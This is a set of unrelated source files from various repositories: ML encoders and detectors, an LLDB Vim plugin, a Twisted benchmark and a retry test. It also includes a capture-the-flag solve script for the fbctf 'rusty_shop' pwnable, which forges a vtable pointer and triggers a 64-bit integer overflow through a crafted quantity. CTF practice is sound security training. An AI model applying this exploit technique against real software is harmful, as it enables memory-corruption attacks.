old_attr = gen.is_coroutine_function
try:
del gen.is_coroutine_function
# is_coroutine_function was introduced in tornado 4.5;
# verify that we don't *completely* fall over on old versions
@retry
def retryable(thing):
pass
finally:
gen.is_coroutine_function = old_attr
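# Illustrative sketch (not from the original tests): `retry` also accepts the usual
# tenacity policy arguments when decorating a coroutine. This assumes the vendored
# copy re-exports `stop_after_attempt` and `wait_fixed` like upstream tenacity does;
# the attempt count and wait below are arbitrary example values.
from dbnd._vendor.tenacity import stop_after_attempt, wait_fixed
@retry(stop=stop_after_attempt(3), wait=wait_fixed(0.01))
@gen.coroutine
def _example_bounded_retryable_coroutine(thing):
    yield gen.sleep(0.00001)
    thing.go()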
if __name__ == '__main__':
unittest.main()
|
pwnables/rusty_shop/solve.py
|
cclauss/fbctf-2019-challenges
| 213 |
67067
|
from pwn import *
# Create item
print('1')
FUNC = 0x701e40
#FUNC = 0x41414141 + 0x18
vtable_ptr = FUNC-0x18
print(p64(vtable_ptr) * 8) # name - pointer to fake vtable
print('bob') # description
print('1.23') # price
# Add item to basket
print('4')
print('1') # second item, added above
print('288230376151711745') # quantity - (2**64 / 64) + 1
# Check out
print('6')
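# Illustrative note (not part of the original exploit script): the quantity above is
# chosen so that a 64-bit size computation wraps around. Assuming the binary multiplies
# quantity by a 64-byte per-item size, 288230376151711745 * 64 = 2**64 + 64, which
# truncates to just 64 modulo 2**64 -- a tiny allocation backing a huge logical count.
assert (288230376151711745 * 64) % (2 ** 64) == 64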
|
open_seq2seq/encoders/encoder.py
|
VoiceZen/OpenSeq2Seq
| 1,459 |
67076
|
# Copyright (c) 2018 NVIDIA Corporation
from __future__ import absolute_import, division, print_function
from __future__ import unicode_literals
import abc
import copy
import six
import tensorflow as tf
from open_seq2seq.optimizers.mp_wrapper import mp_regularizer_wrapper
from open_seq2seq.utils.utils import check_params, cast_types
@six.add_metaclass(abc.ABCMeta)
class Encoder:
"""Abstract class from which all encoders must inherit.
"""
@staticmethod
def get_required_params():
"""Static method with description of required parameters.
Returns:
dict:
Dictionary containing all the parameters that **have to** be
included into the ``params`` parameter of the
class :meth:`__init__` method.
"""
return {}
@staticmethod
def get_optional_params():
"""Static method with description of optional parameters.
Returns:
dict:
Dictionary containing all the parameters that **can** be
included into the ``params`` parameter of the
class :meth:`__init__` method.
"""
return {
'regularizer': None, # any valid TensorFlow regularizer
'regularizer_params': dict,
'initializer': None, # any valid TensorFlow initializer
'initializer_params': dict,
'dtype': [tf.float32, tf.float16, 'mixed'],
}
def __init__(self, params, model, name="encoder", mode='train'):
"""Encoder constructor.
Note that encoder constructors should not modify TensorFlow graph, all
graph construction should happen in the :meth:`self._encode() <_encode>`
method.
Args:
params (dict): parameters describing the encoder.
All supported parameters are listed in :meth:`get_required_params`,
:meth:`get_optional_params` functions.
model (instance of a class derived from :class:`Model<models.model.Model>`):
parent model that created this encoder.
Could be None if no model access is required for the use case.
name (str): name for encoder variable scope.
mode (str): mode encoder is going to be run in.
Could be "train", "eval" or "infer".
Config parameters:
* **initializer** --- any valid TensorFlow initializer. If no initializer
is provided, model initializer will be used.
* **initializer_params** (dict) --- dictionary that will be passed to
initializer ``__init__`` method.
    * **regularizer** --- any valid TensorFlow regularizer. If no regularizer
is provided, model regularizer will be used.
* **regularizer_params** (dict) --- dictionary that will be passed to
regularizer ``__init__`` method.
* **dtype** --- model dtype. Could be either ``tf.float16``, ``tf.float32``
or "mixed". For details see
:ref:`mixed precision training <mixed_precision>` section in docs. If no
dtype is provided, model dtype will be used.
"""
check_params(params, self.get_required_params(), self.get_optional_params())
self._params = copy.deepcopy(params)
self._model = model
if 'dtype' not in self._params:
if self._model:
self._params['dtype'] = self._model.params['dtype']
else:
self._params['dtype'] = tf.float32
self._name = name
self._mode = mode
self._compiled = False
def encode(self, input_dict):
"""Wrapper around :meth:`self._encode() <_encode>` method.
Here name, initializer and dtype are set in the variable scope and then
:meth:`self._encode() <_encode>` method is called.
Args:
input_dict (dict): see :meth:`self._encode() <_encode>` docs.
Returns:
see :meth:`self._encode() <_encode>` docs.
"""
if not self._compiled:
if 'regularizer' not in self._params:
if self._model and 'regularizer' in self._model.params:
self._params['regularizer'] = copy.deepcopy(
self._model.params['regularizer']
)
self._params['regularizer_params'] = copy.deepcopy(
self._model.params['regularizer_params']
)
if 'regularizer' in self._params:
init_dict = self._params.get('regularizer_params', {})
if self._params['regularizer'] is not None:
self._params['regularizer'] = self._params['regularizer'](**init_dict)
if self._params['dtype'] == 'mixed':
self._params['regularizer'] = mp_regularizer_wrapper(
self._params['regularizer'],
)
if self._params['dtype'] == 'mixed':
self._params['dtype'] = tf.float16
if 'initializer' in self.params:
init_dict = self.params.get('initializer_params', {})
initializer = self.params['initializer'](**init_dict)
else:
initializer = None
self._compiled = True
with tf.variable_scope(self._name, initializer=initializer,
dtype=self.params['dtype']):
return self._encode(self._cast_types(input_dict))
def _cast_types(self, input_dict):
"""This function performs automatic cast of all inputs to encoder dtype.
Args:
input_dict (dict): dictionary passed to :meth:`self._encode() <_encode>`
method.
Returns:
dict: same as input_dict, but with all Tensors cast to encoder dtype.
"""
return cast_types(input_dict, self.params['dtype'])
@abc.abstractmethod
def _encode(self, input_dict):
"""This is the main function which should construct encoder graph.
Typically, encoder will take raw input sequence as an input and
produce some hidden representation as an output.
Args:
input_dict (dict): dictionary containing encoder inputs.
If the encoder is used with :class:`models.encoder_decoder` class,
``input_dict`` will have the following content::
{
"source_tensors": data_layer.input_tensors['source_tensors']
}
Returns:
dict:
dictionary of encoder outputs. Return all necessary outputs.
Typically this will be just::
{
"outputs": outputs,
"state": state,
}
"""
pass
@property
def params(self):
"""Parameters used to construct the encoder (dictionary)."""
return self._params
@property
def mode(self):
"""Mode encoder is run in."""
return self._mode
@property
def name(self):
"""Encoder name."""
return self._name
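# Minimal illustrative subclass (not part of OpenSeq2Seq): it follows the contract
# described above -- the constructor stays graph-free and all graph construction
# happens in _encode(). The single dense projection and the made-up 'hidden_size'
# parameter are example choices, not an encoder that ships with the library.
class ExampleDenseEncoder(Encoder):
  @staticmethod
  def get_optional_params():
    return dict(Encoder.get_optional_params(), hidden_size=int)
  def _encode(self, input_dict):
    inputs = input_dict['source_tensors'][0]
    outputs = tf.layers.dense(inputs, self.params.get('hidden_size', 128))
    return {'outputs': outputs, 'state': None}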
|
timeflux/nodes/sequence.py
|
HerySon/timeflux
| 123 |
67083
|
"""timeflux.nodes.sequence: generate a sequence"""
from timeflux.core.node import Node
class Sequence(Node):
def __init__(self):
"""Generate a sequence"""
self._current = 0
def update(self):
self.o.set([self._current])
self._current += 1
|
utils/vim-lldb/python-vim-lldb/lldb_controller.py
|
nathawes/swift-lldb
| 427 |
67085
|
#
# This file defines the layer that talks to lldb
#
import os
import re
import sys
import lldb
import vim
from vim_ui import UI
# =================================================
# Convert some enum value to its string counterpart
# =================================================
# Shamelessly copy/pasted from lldbutil.py in the test suite
def state_type_to_str(enum):
"""Returns the stateType string given an enum."""
if enum == lldb.eStateInvalid:
return "invalid"
elif enum == lldb.eStateUnloaded:
return "unloaded"
elif enum == lldb.eStateConnected:
return "connected"
elif enum == lldb.eStateAttaching:
return "attaching"
elif enum == lldb.eStateLaunching:
return "launching"
elif enum == lldb.eStateStopped:
return "stopped"
elif enum == lldb.eStateRunning:
return "running"
elif enum == lldb.eStateStepping:
return "stepping"
elif enum == lldb.eStateCrashed:
return "crashed"
elif enum == lldb.eStateDetached:
return "detached"
elif enum == lldb.eStateExited:
return "exited"
elif enum == lldb.eStateSuspended:
return "suspended"
else:
raise Exception("Unknown StateType enum")
class StepType:
INSTRUCTION = 1
INSTRUCTION_OVER = 2
INTO = 3
OVER = 4
OUT = 5
class LLDBController(object):
""" Handles Vim and LLDB events such as commands and lldb events. """
# Timeouts (sec) for waiting on new events. Because vim is not multi-threaded, we are restricted to
# servicing LLDB events from the main UI thread. Usually, we only process events that are already
# sitting on the queue. But in some situations (when we are expecting an event as a result of some
    # user interaction) we want to wait for it. The constants below set the wait periods during which the
# Vim UI is "blocked". Lower numbers will make Vim more responsive, but LLDB will be delayed and higher
# numbers will mean that LLDB events are processed faster, but the Vim UI may appear less responsive at
# times.
eventDelayStep = 2
eventDelayLaunch = 1
eventDelayContinue = 1
def __init__(self):
""" Creates the LLDB SBDebugger object and initializes the UI class. """
self.target = None
self.process = None
self.load_dependent_modules = True
self.dbg = lldb.SBDebugger.Create()
self.commandInterpreter = self.dbg.GetCommandInterpreter()
self.ui = UI()
def completeCommand(self, a, l, p):
""" Returns a list of viable completions for command a with length l and cursor at p """
assert l[0] == 'L'
# Remove first 'L' character that all commands start with
l = l[1:]
# Adjust length as string has 1 less character
p = int(p) - 1
result = lldb.SBStringList()
num = self.commandInterpreter.HandleCompletion(l, p, 1, -1, result)
if num == -1:
# FIXME: insert completion character... what's a completion
# character?
pass
elif num == -2:
# FIXME: replace line with result.GetStringAtIndex(0)
pass
if result.GetSize() > 0:
results = filter(None, [result.GetStringAtIndex(x)
for x in range(result.GetSize())])
return results
else:
return []
def doStep(self, stepType):
""" Perform a step command and block the UI for eventDelayStep seconds in order to process
events on lldb's event queue.
FIXME: if the step does not complete in eventDelayStep seconds, we relinquish control to
the main thread to avoid the appearance of a "hang". If this happens, the UI will
update whenever; usually when the user moves the cursor. This is somewhat annoying.
"""
if not self.process:
sys.stderr.write("No process to step")
return
t = self.process.GetSelectedThread()
if stepType == StepType.INSTRUCTION:
t.StepInstruction(False)
if stepType == StepType.INSTRUCTION_OVER:
t.StepInstruction(True)
elif stepType == StepType.INTO:
t.StepInto()
elif stepType == StepType.OVER:
t.StepOver()
elif stepType == StepType.OUT:
t.StepOut()
self.processPendingEvents(self.eventDelayStep, True)
def doSelect(self, command, args):
""" Like doCommand, but suppress output when "select" is the first argument."""
a = args.split(' ')
return self.doCommand(command, args, "select" != a[0], True)
def doProcess(self, args):
""" Handle 'process' command. If 'launch' is requested, use doLaunch() instead
of the command interpreter to start the inferior process.
"""
a = args.split(' ')
if len(args) == 0 or (len(a) > 0 and a[0] != 'launch'):
self.doCommand("process", args)
#self.ui.update(self.target, "", self)
else:
self.doLaunch('-s' not in args, "")
def doAttach(self, process_name):
""" Handle process attach. """
error = lldb.SBError()
self.processListener = lldb.SBListener("process_event_listener")
self.target = self.dbg.CreateTarget('')
self.process = self.target.AttachToProcessWithName(
self.processListener, process_name, False, error)
if not error.Success():
sys.stderr.write("Error during attach: " + str(error))
return
self.ui.activate()
self.pid = self.process.GetProcessID()
print "Attached to %s (pid=%d)" % (process_name, self.pid)
def doDetach(self):
if self.process is not None and self.process.IsValid():
pid = self.process.GetProcessID()
state = state_type_to_str(self.process.GetState())
self.process.Detach()
self.processPendingEvents(self.eventDelayLaunch)
def doLaunch(self, stop_at_entry, args):
""" Handle process launch. """
error = lldb.SBError()
fs = self.target.GetExecutable()
exe = os.path.join(fs.GetDirectory(), fs.GetFilename())
if self.process is not None and self.process.IsValid():
pid = self.process.GetProcessID()
state = state_type_to_str(self.process.GetState())
self.process.Destroy()
launchInfo = lldb.SBLaunchInfo(args.split(' '))
self.process = self.target.Launch(launchInfo, error)
if not error.Success():
sys.stderr.write("Error during launch: " + str(error))
return
# launch succeeded, store pid and add some event listeners
self.pid = self.process.GetProcessID()
self.processListener = lldb.SBListener("process_event_listener")
self.process.GetBroadcaster().AddListener(
self.processListener, lldb.SBProcess.eBroadcastBitStateChanged)
print "Launched %s %s (pid=%d)" % (exe, args, self.pid)
if not stop_at_entry:
self.doContinue()
else:
self.processPendingEvents(self.eventDelayLaunch)
def doTarget(self, args):
""" Pass target command to interpreter, except if argument is not one of the valid options, or
is create, in which case try to create a target with the argument as the executable. For example:
target list ==> handled by interpreter
target create blah ==> custom creation of target 'blah'
target blah ==> also creates target blah
"""
target_args = [ # "create",
"delete",
"list",
"modules",
"select",
"stop-hook",
"symbols",
"variable"]
a = args.split(' ')
if len(args) == 0 or (len(a) > 0 and a[0] in target_args):
self.doCommand("target", args)
return
elif len(a) > 1 and a[0] == "create":
exe = a[1]
elif len(a) == 1 and a[0] not in target_args:
exe = a[0]
err = lldb.SBError()
self.target = self.dbg.CreateTarget(
exe, None, None, self.load_dependent_modules, err)
if not self.target:
sys.stderr.write(
"Error creating target %s. %s" %
(str(exe), str(err)))
return
self.ui.activate()
self.ui.update(self.target, "created target %s" % str(exe), self)
def doContinue(self):
""" Handle 'contiue' command.
FIXME: switch to doCommand("continue", ...) to handle -i ignore-count param.
"""
if not self.process or not self.process.IsValid():
sys.stderr.write("No process to continue")
return
self.process.Continue()
self.processPendingEvents(self.eventDelayContinue)
def doBreakpoint(self, args):
""" Handle breakpoint command with command interpreter, except if the user calls
"breakpoint" with no other args, in which case add a breakpoint at the line
under the cursor.
"""
a = args.split(' ')
if len(args) == 0:
show_output = False
# User called us with no args, so toggle the bp under cursor
cw = vim.current.window
cb = vim.current.buffer
name = cb.name
line = cw.cursor[0]
            # Since the UI is responsible for placing signs at bp locations, we have to
# ask it if there already is one or more breakpoints at (file,
# line)...
if self.ui.haveBreakpoint(name, line):
bps = self.ui.getBreakpoints(name, line)
args = "delete %s" % " ".join([str(b.GetID()) for b in bps])
self.ui.deleteBreakpoints(name, line)
else:
args = "set -f %s -l %d" % (name, line)
else:
show_output = True
self.doCommand("breakpoint", args, show_output)
return
def doRefresh(self):
""" process pending events and update UI on request """
status = self.processPendingEvents()
def doShow(self, name):
""" handle :Lshow <name> """
if not name:
self.ui.activate()
return
if self.ui.showWindow(name):
self.ui.update(self.target, "", self)
def doHide(self, name):
""" handle :Lhide <name> """
if self.ui.hideWindow(name):
self.ui.update(self.target, "", self)
def doExit(self):
self.dbg.Terminate()
self.dbg = None
def getCommandResult(self, command, command_args):
""" Run cmd in the command interpreter and returns (success, output) """
result = lldb.SBCommandReturnObject()
cmd = "%s %s" % (command, command_args)
self.commandInterpreter.HandleCommand(cmd, result)
return (result.Succeeded(), result.GetOutput()
if result.Succeeded() else result.GetError())
def doCommand(
self,
command,
command_args,
print_on_success=True,
goto_file=False):
""" Run cmd in interpreter and print result (success or failure) on the vim status line. """
(success, output) = self.getCommandResult(command, command_args)
if success:
self.ui.update(self.target, "", self, goto_file)
if len(output) > 0 and print_on_success:
print output
else:
sys.stderr.write(output)
def getCommandOutput(self, command, command_args=""):
""" runs cmd in the command interpreter andreturns (status, result) """
result = lldb.SBCommandReturnObject()
cmd = "%s %s" % (command, command_args)
self.commandInterpreter.HandleCommand(cmd, result)
return (result.Succeeded(), result.GetOutput()
if result.Succeeded() else result.GetError())
def processPendingEvents(self, wait_seconds=0, goto_file=True):
""" Handle any events that are queued from the inferior.
Blocks for at most wait_seconds, or if wait_seconds == 0,
process only events that are already queued.
"""
status = None
num_events_handled = 0
if self.process is not None:
event = lldb.SBEvent()
old_state = self.process.GetState()
new_state = None
done = False
if old_state == lldb.eStateInvalid or old_state == lldb.eStateExited:
# Early-exit if we are in 'boring' states
pass
else:
while not done and self.processListener is not None:
if not self.processListener.PeekAtNextEvent(event):
if wait_seconds > 0:
# No events on the queue, but we are allowed to wait for wait_seconds
# for any events to show up.
self.processListener.WaitForEvent(
wait_seconds, event)
new_state = lldb.SBProcess.GetStateFromEvent(event)
num_events_handled += 1
done = not self.processListener.PeekAtNextEvent(event)
else:
# An event is on the queue, process it here.
self.processListener.GetNextEvent(event)
new_state = lldb.SBProcess.GetStateFromEvent(event)
# continue if stopped after attaching
if old_state == lldb.eStateAttaching and new_state == lldb.eStateStopped:
self.process.Continue()
# If needed, perform any event-specific behaviour here
num_events_handled += 1
if num_events_handled == 0:
pass
else:
if old_state == new_state:
status = ""
self.ui.update(self.target, status, self, goto_file)
def returnCompleteCommand(a, l, p):
""" Returns a "\n"-separated string with possible completion results
for command a with length l and cursor at p.
"""
separator = "\n"
results = ctrl.completeCommand(a, l, p)
vim.command('return "%s%s"' % (separator.join(results), separator))
def returnCompleteWindow(a, l, p):
""" Returns a "\n"-separated string with possible completion results
for commands that expect a window name parameter (like hide/show).
FIXME: connect to ctrl.ui instead of hardcoding the list here
"""
separator = "\n"
results = [
'breakpoints',
'backtrace',
'disassembly',
'locals',
'threads',
'registers']
vim.command('return "%s%s"' % (separator.join(results), separator))
global ctrl
ctrl = LLDBController()
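def _example_run_lldb_command(controller, command_text="version"):
    """ Illustrative helper (not part of the original plugin): getCommandResult() and
        doCommand() above boil down to driving lldb's command interpreter through an
        SBCommandReturnObject, as sketched here. "version" is an arbitrary example
        command and this helper is never called by the plugin itself.
    """
    result = lldb.SBCommandReturnObject()
    controller.commandInterpreter.HandleCommand(command_text, result)
    if result.Succeeded():
        return result.GetOutput()
    return result.GetError()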
|
openproblems/api/load.py
|
dburkhardt/SingleCellOpenProblems
| 134 |
67087
|
<filename>openproblems/api/load.py
from . import utils
def load_dataset(task_name, function_name, test):
"""Load a dataset for a task."""
fun = utils.get_function(task_name, "datasets", function_name)
return fun(test=test)
def main(args):
"""Run the ``load`` subcommand."""
adata = load_dataset(args.task, args.name, args.test)
adata.write_h5ad(args.output)
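# Illustrative usage sketch (not part of the module): main() only needs an object
# exposing task, name, test and output attributes, so it can be driven without the
# CLI. The task and dataset names below are placeholders, not identifiers that
# necessarily exist in openproblems.
#
#   import argparse
#   main(argparse.Namespace(task="some_task", name="some_dataset", test=True,
#                           output="dataset.h5ad"))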
|
src/lib/detectors/ddd.py
|
nerminsamet/houghnet
| 161 |
67088
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
import numpy as np
from progress.bar import Bar
import time
import torch
from src.lib.external.nms import soft_nms
from src.lib.models.decode import ddd_decode
from src.lib.models.utils import flip_tensor
from src.lib.utils.image import get_affine_transform
from src.lib.utils.post_process import ddd_post_process
from src.lib.utils.debugger import Debugger
from src.lib.utils.ddd_utils import compute_box_3d, project_to_image, alpha2rot_y
from src.lib.utils.ddd_utils import draw_box_3d, unproject_2d_to_3d
from .base_detector import BaseDetector
class DddDetector(BaseDetector):
def __init__(self, opt):
super(DddDetector, self).__init__(opt)
self.calib = np.array([[707.0493, 0, 604.0814, 45.75831],
[0, 707.0493, 180.5066, -0.3454157],
[0, 0, 1., 0.004981016]], dtype=np.float32)
def pre_process(self, image, scale, calib=None):
height, width = image.shape[0:2]
inp_height, inp_width = self.opt.input_h, self.opt.input_w
c = np.array([width / 2, height / 2], dtype=np.float32)
if self.opt.keep_res:
s = np.array([inp_width, inp_height], dtype=np.int32)
else:
s = np.array([width, height], dtype=np.int32)
trans_input = get_affine_transform(c, s, 0, [inp_width, inp_height])
resized_image = image #cv2.resize(image, (width, height))
inp_image = cv2.warpAffine(
resized_image, trans_input, (inp_width, inp_height),
flags=cv2.INTER_LINEAR)
inp_image = (inp_image.astype(np.float32) / 255.)
inp_image = (inp_image - self.mean) / self.std
images = inp_image.transpose(2, 0, 1)[np.newaxis, ...]
calib = np.array(calib, dtype=np.float32) if calib is not None \
else self.calib
images = torch.from_numpy(images)
meta = {'c': c, 's': s,
'out_height': inp_height // self.opt.down_ratio,
'out_width': inp_width // self.opt.down_ratio,
'calib': calib}
return images, meta
def process(self, images, return_time=False):
with torch.no_grad():
torch.cuda.synchronize()
output = self.model(images)[-1]
output['hm'] = output['hm'].sigmoid_()
output['dep'] = 1. / (output['dep'].sigmoid() + 1e-6) - 1.
wh = output['wh'] if self.opt.reg_bbox else None
reg = output['reg'] if self.opt.reg_offset else None
torch.cuda.synchronize()
forward_time = time.time()
dets = ddd_decode(output['hm'], output['rot'], output['dep'],
output['dim'], wh=wh, reg=reg, K=self.opt.K)
if return_time:
return output, dets, forward_time
else:
return output, dets
def post_process(self, dets, meta, scale=1):
dets = dets.detach().cpu().numpy()
detections = ddd_post_process(
dets.copy(), [meta['c']], [meta['s']], [meta['calib']], self.opt)
self.this_calib = meta['calib']
return detections[0]
def merge_outputs(self, detections):
results = detections[0]
for j in range(1, self.num_classes + 1):
      if len(results[j]) > 0:
keep_inds = (results[j][:, -1] > self.opt.peak_thresh)
results[j] = results[j][keep_inds]
return results
def debug(self, debugger, images, dets, output, scale=1):
dets = dets.detach().cpu().numpy()
img = images[0].detach().cpu().numpy().transpose(1, 2, 0)
img = ((img * self.std + self.mean) * 255).astype(np.uint8)
pred = debugger.gen_colormap(output['hm'][0].detach().cpu().numpy())
debugger.add_blend_img(img, pred, 'pred_hm')
debugger.add_ct_detection(
img, dets[0], show_box=self.opt.reg_bbox,
center_thresh=self.opt.vis_thresh, img_id='det_pred')
def show_results(self, debugger, image, results):
debugger.add_3d_detection(
image, results, self.this_calib,
center_thresh=self.opt.vis_thresh, img_id='add_pred')
debugger.add_bird_view(
results, center_thresh=self.opt.vis_thresh, img_id='bird_pred')
debugger.show_all_imgs(pause=self.pause)
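# Illustrative note (not part of the detector): process() above decodes the raw depth
# activation x as depth = 1 / (sigmoid(x) + 1e-6) - 1, so larger activations map to
# smaller metric depths. A plain numpy restatement of that transform (example values):
#
#   x = np.array([-2.0, 0.0, 2.0])
#   depth = 1.0 / (1.0 / (1.0 + np.exp(-x)) + 1e-6) - 1.0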
|
docs/conch/benchmarks/buffering_mixin.py
|
Khymeira/twisted
| 4,612 |
67090
|
<gh_stars>1000+
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Benchmarks comparing the write performance of a "normal" Protocol instance
and an instance of a Protocol class which has had L{twisted.conch.mixin}'s
L{BufferingMixin<twisted.conch.mixin.BufferingMixin>} mixed in to perform
Nagle-like write coalescing.
"""
from pprint import pprint
from sys import stdout
from time import time
from twisted.conch.mixin import BufferingMixin
from twisted.internet import reactor
from twisted.internet.defer import Deferred
from twisted.internet.protocol import ClientCreator, Protocol, ServerFactory
from twisted.python.log import startLogging
from twisted.python.usage import Options
class BufferingBenchmark(Options):
"""
Options for configuring the execution parameters of a benchmark run.
"""
optParameters = [
(
"scale",
"s",
"1",
"Work multiplier (bigger takes longer, might resist noise better)",
)
]
def postOptions(self):
self["scale"] = int(self["scale"])
class ServerProtocol(Protocol):
"""
A silent protocol which only waits for a particular amount of input and
then fires a Deferred.
"""
def __init__(self, expected, finished):
self.expected = expected
self.finished = finished
def dataReceived(self, bytes):
self.expected -= len(bytes)
if self.expected == 0:
finished, self.finished = self.finished, None
finished.callback(None)
class BufferingProtocol(Protocol, BufferingMixin):
"""
A protocol which uses the buffering mixin to provide a write method.
"""
class UnbufferingProtocol(Protocol):
"""
A protocol which provides a naive write method which simply passes through
to the transport.
"""
def connectionMade(self):
"""
Bind write to the transport's write method and flush to a no-op
function in order to provide the same API as is provided by
BufferingProtocol.
"""
self.write = self.transport.write
self.flush = lambda: None
def _write(proto, byteCount):
write = proto.write
flush = proto.flush
for i in range(byteCount):
write("x")
flush()
def _benchmark(byteCount, clientProtocol):
result = {}
finished = Deferred()
def cbFinished(ignored):
result["disconnected"] = time()
result["duration"] = result["disconnected"] - result["connected"]
return result
finished.addCallback(cbFinished)
f = ServerFactory()
f.protocol = lambda: ServerProtocol(byteCount, finished)
server = reactor.listenTCP(0, f)
f2 = ClientCreator(reactor, clientProtocol)
proto = f2.connectTCP("127.0.0.1", server.getHost().port)
def connected(proto):
result["connected"] = time()
return proto
proto.addCallback(connected)
proto.addCallback(_write, byteCount)
return finished
def _benchmarkBuffered(byteCount):
return _benchmark(byteCount, BufferingProtocol)
def _benchmarkUnbuffered(byteCount):
return _benchmark(byteCount, UnbufferingProtocol)
def benchmark(scale=1):
"""
Benchmark and return information regarding the relative performance of a
protocol which does not use the buffering mixin and a protocol which
does.
@type scale: C{int}
@param scale: A multiplier to the amount of work to perform
@return: A Deferred which will fire with a dictionary mapping each of
the two unicode strings C{u'buffered'} and C{u'unbuffered'} to
dictionaries describing the performance of a protocol of each type.
These value dictionaries will map the unicode strings C{u'connected'}
and C{u'disconnected'} to the times at which each of those events
        occurred and C{u'duration'} to the difference between these two values.
"""
overallResult = {}
byteCount = 1024
bufferedDeferred = _benchmarkBuffered(byteCount * scale)
def didBuffered(bufferedResult):
overallResult["buffered"] = bufferedResult
unbufferedDeferred = _benchmarkUnbuffered(byteCount * scale)
def didUnbuffered(unbufferedResult):
overallResult["unbuffered"] = unbufferedResult
return overallResult
unbufferedDeferred.addCallback(didUnbuffered)
return unbufferedDeferred
bufferedDeferred.addCallback(didBuffered)
return bufferedDeferred
def main(args=None):
"""
Perform a single benchmark run, starting and stopping the reactor and
logging system as necessary.
"""
startLogging(stdout)
options = BufferingBenchmark()
options.parseOptions(args)
d = benchmark(options["scale"])
def cbBenchmark(result):
pprint(result)
def ebBenchmark(err):
print(err.getTraceback())
d.addCallbacks(cbBenchmark, ebBenchmark)
def stopReactor(ign):
reactor.stop()
d.addBoth(stopReactor)
reactor.run()
if __name__ == "__main__":
main()
|
show-adapt-tell/pretrain_CNN_D.py
|
tsenghungchen/show-adapt-and-tell
| 166 |
67110
|
<gh_stars>100-1000
from __future__ import division
import os
import time
import tensorflow as tf
import numpy as np
from tqdm import tqdm
from highway import *
import pdb
class D_pretrained():
def __init__(self, sess, dataset, negative_dataset, D_info, conf=None, l2_reg_lambda=0.2):
self.sess = sess
self.batch_size = conf.batch_size
self.max_iter = conf.max_iter
self.num_train = dataset.num_train
self.hidden_size = conf.D_hidden_size # 512
self.dict_size = dataset.dict_size
self.max_words = dataset.max_words
self.dataset = dataset
self.negative_dataset = negative_dataset
self.checkpoint_dir = conf.checkpoint_dir
self.global_step = tf.get_variable('global_step', [],initializer=tf.constant_initializer(0), trainable=False)
self.optim = tf.train.AdamOptimizer(conf.learning_rate)
self.filter_sizes = D_info['filter_sizes']
self.num_filters = D_info['num_filters']
self.num_filters_total = sum(self.num_filters)
self.num_classes = D_info['num_classes']
self.l2_reg_lambda = l2_reg_lambda
self.START = self.dataset.word2ix[u'<BOS>']
self.END = self.dataset.word2ix[u'<EOS>']
self.UNK = self.dataset.word2ix[u'<UNK>']
self.NOT = self.dataset.word2ix[u'<NOT>']
# placeholder
self.text = tf.placeholder(tf.int32, [None, self.max_words], name="text")
self.label = tf.placeholder(tf.float32, [None, self.num_classes], name="label")
self.images = tf.placeholder(tf.float32, [None, self.dataset.img_dims], name="images")
self.loss, self.pred = self.build_Discriminator(self.images, self.text, self.label, name='D')
self.loss_sum = tf.scalar_summary("loss", self.loss)
params = tf.trainable_variables()
self.D_params_dict = {}
self.D_params_train = []
for param in params:
self.D_params_dict.update({param.name:param})
if "embedding" in param.name:
embedding_matrix = np.load("embedding-42000.npy")
self.embedding_assign_op = param.assign(tf.Variable(embedding_matrix, trainable=False))
else:
self.D_params_train.append(param)
def build_Discriminator(self, images, text, label, name="discriminator", reuse=False):
### sentence: B, S
hidden_size = self.hidden_size
random_uniform_init = tf.random_uniform_initializer(minval=-0.1, maxval=0.1)
with tf.variable_scope(name):
if reuse:
tf.get_variable_scope().reuse_variables()
with tf.device('/cpu:0'), tf.variable_scope("embedding"):
word_emb_W = tf.get_variable("word_emb_W", [self.dict_size, hidden_size], "float32", random_uniform_init)
embedded_chars = tf.nn.embedding_lookup(word_emb_W, text) # B,S,H
embedded_chars_expanded = tf.expand_dims(embedded_chars, -1) # B,S,H,1
with tf.variable_scope("output"):
output_W = tf.get_variable("output_W", [hidden_size, self.num_classes],
"float32", random_uniform_init)
output_b = tf.get_variable("output_b", [self.num_classes], "float32", random_uniform_init)
with tf.variable_scope("images"):
images_W = tf.get_variable("images_W", [self.dataset.img_dims, hidden_size],
"float32", random_uniform_init)
images_b = tf.get_variable("images_b", [hidden_size], "float32", random_uniform_init)
with tf.variable_scope("text"):
text_W = tf.get_variable("text_W", [self.num_filters_total, hidden_size],
"float32", random_uniform_init)
text_b = tf.get_variable("text_b", [hidden_size], "float32", random_uniform_init)
# Create a convolution + maxpool layer for each filter size
pooled_outputs = []
# Keeping track of l2 regularization loss (optional)
l2_loss = tf.constant(0.0)
for filter_size, num_filter in zip(self.filter_sizes, self.num_filters):
with tf.variable_scope("conv-maxpool-%s" % filter_size):
# Convolution Layer
filter_shape = [filter_size, hidden_size, 1, num_filter]
W = tf.get_variable("W", filter_shape, "float32", random_uniform_init)
b = tf.get_variable("b", [num_filter], "float32", random_uniform_init)
conv = tf.nn.conv2d(
embedded_chars_expanded,
W,
strides=[1, 1, 1, 1],
padding="VALID",
name="conv")
# Apply nonlinearity
h = tf.nn.relu(tf.nn.bias_add(conv, b), name="relu")
# Maxpooling over the outputs
pooled = tf.nn.max_pool(
h,
ksize=[1, self.max_words - filter_size + 1, 1, 1],
strides=[1, 1, 1, 1],
padding='VALID',
name="pool")
pooled_outputs.append(pooled)
h_pool = tf.concat(3, pooled_outputs) # B,1,1,total filters
h_pool_flat = tf.reshape(h_pool, [-1, self.num_filters_total]) # b, total filters
# Add highway
with tf.variable_scope("highway"):
h_highway = highway(h_pool_flat, h_pool_flat.get_shape()[1], 1, 0)
with tf.variable_scope("text"):
text_emb = tf.nn.xw_plus_b(h_highway, text_W, text_b, name="text_emb")
with tf.variable_scope("images"):
images_emb = tf.nn.xw_plus_b(images, images_W, images_b, name="images_emb")
with tf.variable_scope("output"):
fusing_vec = tf.mul(text_emb, images_emb)
l2_loss += tf.nn.l2_loss(output_W)
l2_loss += tf.nn.l2_loss(output_b)
logits = tf.nn.xw_plus_b(fusing_vec, output_W, output_b, name="logits")
ypred_for_auc = tf.nn.softmax(logits)
predictions = tf.argmax(logits, 1, name="predictions")
#predictions = tf.nn.sigmoid(logits, name="predictions")
# Calculate Mean cross-entropy loss
with tf.variable_scope("loss"):
losses = tf.nn.softmax_cross_entropy_with_logits(logits, label)
#losses = tf.nn.sigmoid_cross_entropy_with_logits(tf.squeeze(logits), self.input_y)
loss = tf.reduce_mean(losses) + self.l2_reg_lambda * l2_loss
return loss, predictions
def train(self):
self.train_op = self.optim.minimize(self.loss, global_step=self.global_step, var_list=self.D_params_train)
